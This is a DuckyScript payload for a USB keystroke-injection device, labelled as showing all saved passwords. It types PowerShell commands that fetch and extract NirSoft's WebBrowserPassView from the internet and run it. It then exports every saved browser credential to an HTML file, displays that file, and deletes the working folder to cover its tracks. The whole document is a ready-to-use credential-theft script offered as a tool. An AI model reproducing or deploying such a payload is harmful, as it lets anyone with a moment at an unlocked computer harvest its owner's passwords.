REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Shows all saved passwords.
REM Version:	1.0
REM Category:	Passwords
DELAY 900
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
ENTER
DELAY 5000
STRING wbpv28821@
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A
CTRL S
DELAY 1000
STRING export.html
TAB
STRING h
ENTER
DELAY 1000
ALT F4
DELAY 1000
STRING Start-Process msedge.exe 'file:///C:/temp/export.html --inprivate'
ENTER
DELAY 2000
ALT TAB
DELAY 1000
STRING cd \
ENTER
STRING rmdir -R \temp
ENTER
STRING EXIT
ENTER
